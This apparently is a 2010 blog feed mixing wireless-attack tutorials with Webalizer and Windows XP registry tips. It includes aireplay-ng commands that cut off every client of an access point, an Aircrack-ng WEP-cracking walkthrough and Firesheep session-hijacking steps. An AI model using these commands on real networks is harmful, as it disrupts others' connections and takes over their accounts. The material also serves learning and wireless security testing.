Perintah diatas sudah diuji cobakan dengan berhasil 100%

Menggunakan aireplay-ng

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 13:24:00 +0000

1. Set device channel mode
yang dimaksud disini yaitu menyamakan channel yang pada interface wireless kita ke channel yang dipake ap
bisa pake command
iwconfig mon0 channel 4

2. aireplay-ng --deauth 3000 -a [Mac AP Target] -c ff:ff:ff:ff:ff:ff eth1
jumlah count pada --deauth itu menunjukan jumlah pake yang di kirim / detik (klo ngak salah sih gitu)jadi klo 3000 berarti 3000 detik
-c ff:ff:ff:ff:ff:ff semua client yang konek ke AP target akan di matikan semua koneksinya

atau

mode monitoring on
aireplay-ng --deauth 100000000000 -e [MAC kita] -a [MAC AP target] mon0
contoh:

aireplay-ng --deauth 100000000000 -e 00:17:c4:5a:c1:73 -a 00:19:5B:8A:57:AF mon0

==>> intinya ditujukan ke SEMUA klien yang konek dengan AP tersebut pkoknya tinggal gnti MAC destination

watch -n 1 aireplay-ng --deauth

1 -a [Mac AP Target] -c ff:ff:ff:ff:ff:ff eth1

#aireplay-ng --deauth 100000000000 -a 00:15:E9:F9:3A:3D -c 00:1B:77:9E:3C:47 mon0 (matiin 1 client yg konek dengan wifi)

--deauth 100000000000: pemutusan koneksi akan terus dicoba oleh aireplay selama 100000000000x (terserah mau berapa X).

-a : adalah bssid/mac dari AP target

-c : adalah client yang ingin kita putuskan koneksi nya.

mon0: injeksi menggunakan adapter virtual yang baru diciptakan tadi

untuk menggunakan cara ini, tentunya chipset wireless kita harus mendukung

Aircrack-ng Newbie Guide for Linux

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 12:59:00 +0000

This tutorial will give you the basics to get started using the aircrack-ng suite. It is impossible to provide every piece of information you need and cover every scenario. So be prepared to do some homework and research on your own. The Forum and the Wiki have lots of supplementary tutorials and information.

Although it does not cover all the steps from start to finish like this tutorial, the Simple WEP Crack tutorial covers the actual aircrack-ng steps in much more detail.

Setting up Hardware, Installing Aircrack-ng

The first step in getting aircrack-ng working properly on your Linux system is patching and installing the proper driver for your wireless card. Many cards work with multiple drivers, some of which provide the necessary features for using aircrack-ng, and some of which do not.

Needless to say, you need a wireless card which is compatible with the aircrack-ng suite. This is hardware which is fully compatible and can inject packets. A compatible wireless card can be used to crack a wireless access point in under an hour.

To determine to which category your card belongs to, see hardware compatibility page. Read Tutorial: Is My Wireless Card Compatible? if you don't know where to look in this table. It still does not hurt to read this tutorial to build your knowledge and confirm your card attributes.

First, you need to know which chipset is used in your wireless card and which driver you need for it. You will have determined this using the information in the previous paragraph. The drivers section will tell you which drivers you need for your specific chipset. Download them and then get the corresponding patch from http://patches.aircrack-ng.org. (These patches enables the support for injection.)

As I own a Ralink USB device, I am providing the steps to get it working with Aircrack-ng. Before you are able to compile and install drivers, you need the kernel-sources for your distribution installed.

If you own another type of card, check the installing drivers page for instructions about other drivers. As well, do a search in the net if you're unsure how to install them.

RaLink USB rt2570 Setup guide

If you own a rt2570 USB device (like D-Link DWL-G122 rev. B1 or Linksys WUSB54G v4) you should use the drivers from http://homepages.tu-darmstadt.de/~p_larbig/wlan/ These are special modified drivers, which support injection and are reported to work best with Aircrack-ng. They don't need to be patched. Of course these drivers do also work for normal operation. (Starting with kernel 2.6.25 and Aircrack-ng v1.0-rc1, the in-kernel driver, rt2500usb, can also be used.)

Lets unpack, compile and install the drivers:

tar xfj rt2570-k2wrlz-1.3.0.tar.bz2
cd rt2570-k2wrlz-1.3.0/Module
make
make install

The last step has to be performed as root. Use su to change to root. Now we can load the module into the kernel:

modprobe rt2570

Plug in your card, it should be recognized as rausb0 now. Run iwconfig to list your wireless devices and check if everything is working.

Aircrack-ng installation

Source

Get the latest copy of aircrack-ng from the homepage: http://www.aircrack-ng.org The following commands would have to be changed if you use a newer version of the software.

Unpacking, compiling, installing:

tar xfz aircrack-ng-1.0-rc1.tar.gz
cd aircrack-ng-1.0-rc1
make
make install

As usual, the last step needs to be performed as root, use su or sudo -s to login as root (use sudo make install for Ubuntu).

YUM

WARNING!!! Currently, neither of the repositories hosts the latest version of Aircrack-ng. It's recommended that you use the first method instead.

If you are using a system like Redhat Linux or Fedora Core you can install aircrack-ng with yum. First you have to add the repository of Dag Wieers or Dries.

su
yum -y install aircrack-ng

RPM

WARNING!!! Currently, neither of the repositories hosts the latest version of Aircrack-ng. It's recommended that you use the first method instead.

If you are using a system which is rpm-based then you can take the easy way to install aircrack-ng. (Example for Redhat Linux 4)

su
rpm -ihv http://dag.wieers.com/rpm/packages/aircrack-ng/aircrack-ng-0.7-1.el4.rf.i386.rpm

IMPORTANT: Check http://dag.wieers.com/rpm/packages/aircrack-ng/ for the latest version of the aircrack-ng suite and change the command above to reference the latest version.

IEEE 802.11 basics

Ok, now everything is ready, time to make a pit stop before the action finally starts and learn something about how wireless networks work.

The following chapter is very important, if something doesn't work as expected. Knowing what all is about helps you find the problem or helps you at least to describe it so someone else who can help you. This is a little bit scientific and maybe you feel like skipping it. However, a little knowledge is necessary to crack wireless networks and because it is a little more than just typing one command and letting aircrack do the rest.

How a wireless network is found

This is a short introduction into managed networks, these ones working with Access Points (AP). Every AP sends out about 10 so called beacon frames a second. These packets contain the following information:

Name of the network (ESSID)
If encryption is used (and what encryption is used; pay attention, that may not be always true just because the AP advertises it)
What MBit data rates are supported
Which channel the network is on

This information is then shown in your tool that connects to this network. It is shown when you let your card scan for networks with iwlist scan and when you run airodump-ng.

Every AP has a unique MAC address (48 bit, 6 pair of hexadecimal numbers). It looks like 00:01:23:4A:BC:DE. Every network hardware device has such an address and network devices communicate with each other by using this MAC address. So its basically like a unique name. MAC addresses are unique, no two network devices in the world have the same MAC address.

Connecting with a network

If you want to connect to a wireless network, there are some possibilities. In most cases, Open System Authentication is used. (Optional: If you want to learn more about authentication, check this out.)

Open System Authentication:

Ask the AP for authentication.
The AP answers: OK, you are authenticated.
Ask the AP for association
The AP answers: OK, you are now connected.

This is the simplest case, BUT there could be some problems if you are not legitimate to connect:

WPA/WPA2 is in use, you need EAPOL authentication. The AP will deny you at step 2.
Access Point has a list of allowed clients (MAC addresses), and it lets no one else connect. This is called MAC filtering.
Access Point uses Shared Key Authentication, you need to supply the correct WEP key to be able to connect. (See the How to do shared key fake authentication? tutorial for advanced techniques.)

Simple sniffing and cracking

Discovering Networks

The first thing to do is looking out for a potential target. The aircrack-ng suite contains airodump-ng for this - but other programs like Kismet can be used too.

Prior to looking for networks, you must put your wireless card into what is called “monitor mode”. Monitor mode is a special mode that allows your PC to listen to every wireless packet. This monitor mode also allows you to optionally inject packets into a network. Injection will be covered later in this tutorial.

To put your wireless card into monitor mode:

airmon-ng start rausb0

To confirm it is in monitor mode, run “iwconfig” and confirm the mode. The airmon-ng page on the Wiki has generic information and how to start it for other drivers.

Then, start airodump-ng to look out for networks:

airodump-ng rausb0

“rausb0” is the network interface (nic) name. If you are using a different WLAN device than a rt2570 you'll have to use a different nic name. Take a look in the documentation of the nic driver. For most newer drivers, the primary interface name is “wlan0”, but for monitoring, a secondary interface (“mon0”, created when you run airmon-ng) is used.

If airodump-ng could connect to the WLAN device, you'll see a screen like this:

airodump-ng hops from channel to channel and shows all access points it can receive beacons from. Channels 1 to 14 are used for 802.11b and g (in US, they only are allowed to use 1 to 11; 1 to 13 in Europe with some special cases; 1-14 in Japan). Channels between 36 and 149 are used for 802.11a. The current channel is shown in the top left corner.

After a short time some APs and (hopefully) some associated clients will show up.

The upper data block shows the access points found:

BSSID	The MAC address of the AP
PWR	Signal strength. Some drivers don't report it
Beacons	Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data	Number of data frames received
CH	Channel the AP is operating on
MB	Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENC	Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet)
ESSID	The network name. Sometimes hidden

The lower data block shows the clients found:

BSSID	The MAC of the AP this client is associated to
STATION	The MAC of the client itself
PWR	Signal strength. Some drivers don't report it
Packets	Number of data frames received
Probes	Network names (ESSIDs) this client has probed

Now you should look out for a target network. It should have a client connected because cracking networks without a client is an advanced topic (See How to crack wep with no clients). It should use WEP encryption and have a high signal strength. Maybe you can re-position your antenna to get a better signal. Often a few centimeters make a big difference in signal strength.

In the example above the net 00:01:02:03:04:05 would be the only possible target because it's the only one with an associated client. But it also has a high signal strength so it's really a good target to practice.

Sniffing IVs

Because of the channel hopping you won't capture all packets from your target net. So we want to listen just on one channel and additionally write all data to disk to be able to use it for cracking:

airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0

With the -c parameter you tune to a channel and the parameter after -w is the prefix to the network dumps written to disk. The ”--bssid” combined with the AP MAC address limits the capture to the one AP. The ”--bssid” option is only available on new versions of airodump-ng.

Before being able to crack WEP you'll usually need between 40 000 and 85 000 different Initialization Vectors (IVs). Every data packet contains an IV. IVs can be re-used, so the number of different IVs is usually a bit lower than the number of data packets captured.

So you'll have to wait and capture 40K to 85K of data packets (IVs). If the network is not busy it will take a very long time. Often you can speed it up a lot by using an active attack (=packet replay). See the next chapter.

Cracking

If you've got enough IVs captured in one or more file, you can try to crack the WEP key:

aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets. You can use multiple files, just add all their names or you can use a wildcard such as dump*.cap.

For more information about aircrack-ng parameters, description of the output and usage see the manual.

The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stronger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this it not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking.

There are some more advanced APs out there that use an algorithm to filter out weak IVs. The result is either that you can't get more than “n” different IVs from the AP or that you'll need millions (like 5 to 7 million) to crack the key. Search in the Forum, there are some threads about cases like this and what to do.

Active attacks

Injection support

Most devices don't support injection - at least not without patched drivers. Some only support certain attacks. Take a look at the compatibility page, column aireplay. Sometimes this table is not up-to-date, so if you see a “NO” for your driver there don't give up yet, but look at the driver homepage, the driver mailing list or our Forum. If you were able to successfully replay using a driver which is not listed as supported, don't hesitate to update the compatibility page table and add a link to a short howto. (To do this, request a wiki account on IRC.)

The first step is to make sure packet injection really works with your card and driver. The easiest way to test it is the injection test attack. Make sure to perform this test prior to proceeding. Your card must be able to successfully inject in order to perform the following steps.

You'll need the BSSID (AP MAC) and ESSID (network name) of an AP that does not do MAC filtering (e.g. your own) and must be in range of the AP.

Try to connect to your AP using aireplay-ng:

aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 rausb0

The value after -a is the BSSID of your AP.

If injection works you should see something like this:

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

If not

double-check ESSID and BSSID
make sure your AP has MAC filtering disabled
test it against another AP
make sure your driver is properly patched and supported
Instead of “0”, try “6000 -o 1 -q 10”

ARP replay

Now that we know that packet injection works, we can do something to massively speed up capturing IVs: ARP-request reinjection

The idea

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).

The lazy way

First open a window with an airodump-ng sniffing for traffic (see above). aireplay-ng and airodump-ng can run together. Wait for a client to show up on the target network. Then start the attack:

aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0

-b specifies the target BSSID, -h the MAC of the connected client.

Now you have to wait for an ARP packet to arrive. Usually you'll have to wait for a few minutes (or look at the next chapter).

If you were successful, you'll see something like this:

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

If you have to stop replaying, you don't have to wait for the next ARP packet to show up, but you can re-use the previously captured packet(s) with the -r option.

When using the arp injection technique, you can use the PTW method to crack the WEP key. This dramatically reduces the number of data packets you need and also the time needed. You must capture the full packet in airodump-ng, meaning do not use the ”--ivs” option when starting it. For aircrack-ng, use “aircrack -z ”. (PTW is the default attack in 1.0-rc1.)

If the number of data packets received by airodump-ng sometimes stops increasing you maybe have to reduce the replay-rate. You do this with the -x option. I usually start out with 50 and reduce until packets are received continuously again. Better positioning of your antenna usually also helps.

The aggressive way

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.

Keep your airodump-ng and aireplay-ng running. Open another window and run a deauthentication attack:

aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 rausb0

-a is the BSSID of the AP, -c the MAC of the targeted client.

Wait a few seconds and your arp replay should start running.

Most clients try to reconnect automatically. But the risk that someone recognizes this attack or at least attention is drawn to the stuff happening on the WLAN is higher than with other attacks.

Blacksheep Countermeasure for Firesheep

noreply@blogger.com (Heri) — Fri, 19 Nov 2010 01:53:00 +0000

there's another tools to countermeasure this type of attack. A free Firefox plugin called BlackSheep, which serves as a counter-measure. BlackSheep combats Firesheep by monitoring traffic and then alerting users if Firesheep is being used on the network.

BlackSheep does this by dropping ‘fake’ session ID information on the wire and then monitors traffic to see if it has been hijacked.

It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will be receive the following warning message:

Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

So if you feel not safe browsing in a public network such as hotspot, you can run this tools to guide you along your browsing time. If there;s some alert in your network, don't be panic, just logout your account such as : facebook, wordpress, amazon, etc. and your account should be safe, but it will be a little annoying…it's better to try

Firesheep HTTP Session Hijacking

noreply@blogger.com (Heri) — Fri, 19 Nov 2010 01:46:00 +0000

Firesheep is a firefox extension to do the session hijacking. I was very surprised that this tools can hijack Facebook, Twitter, WordPress, Amazon, etc from the valid user. The most important thing that this tools is very easy to configure and to launch an attack. Just a few step : 1. Download Firesheep 2. Sit on a unencrypted wireless network 3. Turn on your wireless card and join the network 4. Start capturing with firesheep 5. Just waiting until some user authenticate at the facebook, twitter, etc.

Step by step :

1. The picture below is the interface of firesheep and you can click the red circle for preferences

2. In this picture you should choose which interface you want to capture the data. for example when you're in a wireless network, you should activate the wireless adapter.

3. This picture below tells you which website session can hijacked handle by this addons,

4. Usually when capturing data, will use TCP port 80, because if it's 443 I think will be encrypted, but I still didn't try for another port .

5. When you finish, click the "Start Capturing" and wait until someone authenticate some website on the website list.

Prevention:

1. You can use Blacksheep,

2. You can tunnel your internet connection,

3. Don't use "Remember Me" feature in public internet area(Hotspot), and logout after you finish use the internet.

That's it. I hope you can use this tutorials in a good way

Install and Configure Webalizer on Ubuntu

noreply@blogger.com (Heri) — Thu, 18 Nov 2010 04:38:00 +0000

1. install webalizer

sudo apt-get install webalizer

If webalizer is not found, you have to add sources in /etc/apt/sources.list: can comment the universe sources.
2. Enable the apache2 hostname resolution: go into /etc/apache2/apache2.conf: Change

HostnameLookups Off

into

HostnameLookups On

1. By default webalizer is not well configured: it does not check in the good log. In /etc/webalizer.conf: Change

LogFile /var/log/apache/access.log.1

LogFile /var/log/apache2/access.log

2. Test webalizer:

sudo webalizer

If you get a warning like warning: Truncating …
It is because you did not put the hostnameLookup. If afterward, you get this message, it can be because you are attacked by a virus…
3. Run webalizer as a cronjob. This has to be run as root: Edit the root cronjobs by running the command:

sudo crontab -e

and add the line:

0 * * * * webalizer

With that line, every hour webalizer is run

Utak - atik Registry Windows XP

noreply@blogger.com (Heri) — Tue, 16 Nov 2010 10:44:00 +0000

Registry, dalam platform sistem operasi Microsoft Windows 32-bit, merupakan sebuah basis data yang disusun secara hierarkis yang mengandung informasi mengenai konfigurasi sebuah sistem, mulai dari konfigurasi perangkat keras, perangkat lunak, asosiasi ekstensi berkas dengan aplikasinya hingga preferensi pengguna. Registry merupakan pengganti berkas-berkas konfigurasi *.INI yang digunakan dalam sistem Windows 16-bit (Windows 3.x dan Windows for Workgroups). Registry, pertama kali diperkenalkan di dalam sistem Windows 16-bit sebagai penampung informasi mengenai pemetaan/asosiasi ekstensi berkas dengan aplikasinya, dan kemudian dikembangkan menjadi basis data dengan cakupan yang luas pada sistem-sistem operasi keluarga Windows NT. Registry juga kemudian digunakan pada sistem operasi kelas rumahan: Windows 95, Windows 98 dan Windows ME, tapi memang implementasi yang cukup bagus dari registry terdapat di dalam keluarga sistem operasi Windows NT. (http://id.wikipedia.org/wiki/Registry_Windows)

regstry windows dapat digunakan untuk memaksimalkan kerja windows ataupun hanya sekedar untuk mengganti setingan-setingan tertentu yang tidak terdapat pada menu windows.

berikut saya lampirkan script untuk ‘utak-atik registry’

cekidot………..

Mengganti Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada wallpaper dan masukkan path gambar yang diinginkan pada Value Data.

Mengganti Nama Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
Klik ganda pada option (Default value) dan beri nama baru sesuai yang diinginkan pada Value Data.

Memunculkan Rename Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda pada Attributes > Edit Binary Value. Pada Value Data, ganti angka tersebut menjadi 0000 50 01 00 20.

Menyembunyikan Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace Hapus subkey {645FF040-5081-101B-9F08-00AA002F954E}, kemudian Restart komputer untuk melihat hasilnya. Untuk memunculkannya kembali, buat kembali kombinasi angka {645FF040-5081-101B-9F08-00AA002F954E}.

Menambah Isi Shortcut Menu Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda Attributes dan ganti angka di Value Data dengan angka berikut ini:
0000 50 01 00 20 > Rename
0000 60 01 00 20 > Delete
0000 70 01 00 20 > Rename & Delete
0000 41 01 00 20 > Copy
0000 42 01 00 20 > Cut
0000 43 01 00 20 > Copy & Cut
0000 44 01 00 20 > Paste
0000 45 01 00 20 > Copy & Paste
0000 46 01 00 20 > Cut & Paste
0000 47 01 00 20 > Cut, Copy & Paste

Menambah Isi Shortcut Menu Pada Recycle Bin Dengan Menu Pilihan
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/Shell
Klik menu Edit > New > Key dan beri nama yang diinginkan (Misalnya: Go To Windows Explorer).
Dibawah key yang baru tersebut, tekan lagi menu Edit > New > Key dan buat sebuah key baru bernama Command. Klik ganda option (Default), dan pada bagian Value Data, isi dengan path Windows Explorer ( C:WINDOWSExplorer.exe).

Mengembalikan Folder Documents Yang Hilang Di My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths
Pilih menu Edit > New > String Value dan beri nama sesuai dengan username yang digunakan di Windows (contohnya: Chippers) Klik ganda pada value tersebut dan masukkan path tempat dimana Documents anda berada (contohnya D:Documents)

Menyingkirkan File Stored Dari My Computer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/MyComputer/NameSpace/DelegateFolders Hapus subkey {59031a47-3f72-44a7-89c5-5595fe6b30ee} dengan menekan tombol Del.

Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoRecentDocsMenu.
Kemudian klik ganda pada DWORD Value tersebut, dan berikan angka 1 untuk mengaktifkannya.

Menyembunyikan Menu Find
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoFind.
Kemudian klik ganda pada DWORD Value tersebut dan berikan angka 1 untuk mengaktifkannya. Restart komputer.

Menyembunyikan Help And Support
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buatlah sebuah DWORD Value baru – Menu Edit > New > DWORD Value, dan beri nama NoSMHelp.
Kemudian klik ganda pada NoSMHelp dan isi dengan angka 1 pada Value Data. Restart komputer.

Menyembunyikan Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRun. Klik ganda dan masukkan angka 1 sebagai Value Data.

Menyembunyikan Menu Run Dari Start Menu (2)
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari value bernama Start_ShowRun, klik ganda dan masukkan angka 0 pada bagian Value Data.

Menyembunyikan Log Off
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > Binary Value dan beri nama NoLogOff.
Klik ganda pada NoLogOff dan masukkan angka 01 00 00 00 pada bagian Value Data.

Menyembunyikan Menu Turn Off Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoClose.
Klik ganda NoClose dan beri angka 1 pada Value Data.

Cleartype Pada Logon Screen
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda FontSmoothingType dan masukkan angka 2 pada Value Data.

Membuat Tampilan Berbeda Pada Jendela Logon
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager
Klik ganda ColorName dan masukkan teks Metallic pada Value Data.

Menampilkan Administrator Di Welcome Screen
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t
Buat sebuah DWORD Value baru dan beri nama Administrator.
Klik ganda Administrator dan masukkan angka 1 pada Value Data.

Login Otomatis
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon
Klik ganda AltDefaultUserName dan masukkan username account yang dipilih.
Klik ganda AutoAdminLogon dan masukkan angka 1 pada Value Data.
Buat sebuah DWORD Value baru dan beri nama DefaultPassword.
Klik ganda DefaultPassword dan masukkan password account yang dipilih pada Value Data.

Menyembunyikan Ikon Printer & Faxes dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari value bernama Start_ShowPrinters dan berikan angka 0 pada Value Data.

Menyembunyikan Control Panel Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari value bernama Start_ShowControlPanel dan klik ganda pada bagian tersebut.
Masukkan angka 0 pada Value Data.

Menyembunyikan Menu My Pictures Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowMyPics dan masukkan angka 0 pada bagian Value Data.

Memunculkan Menu Administrative Tools
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada StartMenuAdminTools dan berikan angka 1 pada Value Data.

Memperkecil Ikon Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_LargeMFUIcons dan masukkan angka 1 pada Value Data.

Menghilangkan Username Pada Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
Pilih Edit > New > DWORD Value dan beri nama NoUserNameInStartMenu.
Klik ganda NoUserNameInStartMenu dan masukkan angka 1 pada Value Data.

Mencegah Perubahan Menu Start
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoChangeStartMenu.
Klik ganda NoChangeStartMenu dan masukkan angka 1 pada Value Data.

Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowRecentDocs dan masukkan angka 0 pada Value Data.

Mengubah Nama Default Shortcut Penting Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID
Klik ganda pada default value pada masing-masing subkey dibawah ini:
My Network Places:
{208D2C60-3AEA-1069-A2D7-08002B30309D}
My Computer:
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents:
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin:
{645FF040-5081-101B-9F08-00AA002F954E}
Default IE Icon:
{871C5380-42A0-1069-A2EA-08002B30309D}
masukkan nama-nama unik sebagai pengganti nama defaultnya.

Menyembunyikan Ikon Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada HideIcons dan masukkan angka 1 pada Value Data.

Membersihkan Semua Ikon Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoDesktop.
Klik ganda pada NoDesktop dan masukkan angka 1 pada Value Data.

Membuat Desktop Lebih Stabil
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Buat sebuah DWORD Value baru dan beri nama DesktopProcess.
Klik ganda DesktopProcess dan masukkan angka 1 pada Value Data.

Menghapus Daftar Program Dalam Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU
Di jendela sebelah kanan, akan terlihat deretan software-software (ditandai secara alphabet a, b, c, d, dan seterusnya). Untuk menghapusnya, cukup dengan memilih salah satu (atau semua) nama program yang ada dan tekan tombol Del. Jika muncul jendela konfirmasi untuk penghapusan data, tekan Yes.

Membersihkan Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRecentDocsHistory.
Klik ganda pada NoRecentDocsHistory dan masukkan angka 1 pada bagian Value Data.

Menghilangkan Info Tip Pada Ikon Folders Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada FolderContentsInfoTip dengan angka 0.

Mengunci Taskbar
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada TaskBarSizeMove dan masukkan angka 0 pada Value Data.

Menghapus Past Items Icons Pada Taskbar
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerTrayNotify
Hapus IconStreams dan PastIconsStream, kemudian buka Task Manager, pada Tab Processes klik kanan pada explorer.exe dan pilih End Process. Klik menu File > New Task (Run) dan ketikan kembali explorer dan tekan OK.

Menyembunyikan System Tray
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Jika key Explorer belum ada buatlah sebuah DWORD Value baru dan beri nama NoTrayItemsDisplay.
Klik ganda NoTrayItemsDisplay dan masukkan angka 1 pada Value Data.
Untuk mengembalikan System Tray masukkan angka 0 pada Value Data.

Menonaktifkan Klik-kanan Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoViewContextMenu.
Klik ganda pada NoViewContextMenu dan masukkan angka 1 pada Value Data.

Mengubah Waktu Delay Ketika Membuka Menu
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada MenuShowDelay dan ubah angka milidetik yang semula 400 menjadi angka lain. Semakin kecil semakin cepat.

Mengatur Ukuran Ikon Di Desktop Dan Start Menu
HKEY_CURRENT_USER/Control Panel/Desktop/WindowMetrics
Klik ganda pada Shell Icon Size dan ubah angka 32 menjadi angka lainnya, misalnya 10.

Mengganti Warna Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda Window dan masukkan kombinasi warna RGB (gunakan Adobe PhotoShop untuk menemukan kombinasi warna yang sesuai).

Mengganti Warna Teks Dalam Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda WindowText dan masukkan kombinasi warna RGB.

Menghilangkan Tab Screen Saver
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System
Buat sebuah DWORD Value baru dan beri nama NoDispScrSavPage.
Klik ganda NoDispScrSavPage dan masukkan angka 1 pada Value Data.

Mengganti Screen Saver Lewat Registry
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda SCRNSAVE.EXE kemudian masukkan path tempat file Screen Saver yang diinginkan.
Contoh: C:WINDOWSScreenSaver.scr

Menonaktifkan Default Screen Saver
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda ScreenSaveActive dan masukkan angka 0 pada Value Data.
Untuk mengembalikannya masukkan angka 1 pada Value Data.

Menghilangkan Tanda Anak Panah Pada Ikon Shortcut
HKEY_CLASSES_ROOT/Inkfile
HKEY_CLASSES_ROOT/piffile
Ubah nama IsShortcut menjadi IsShortcuts.

Mengubah Style Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada WallpaperStyle dan masukkan angka sebagai berikut di Value Data:
1 > Center
2 > Stretch
3 > Tile

Menonaktifkan Peringatan Low Disk Space
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/PoliciesExplorer
Buatlah sebuah DWORD Value baru dan beri nama NoLowDiskSpaceChecks.
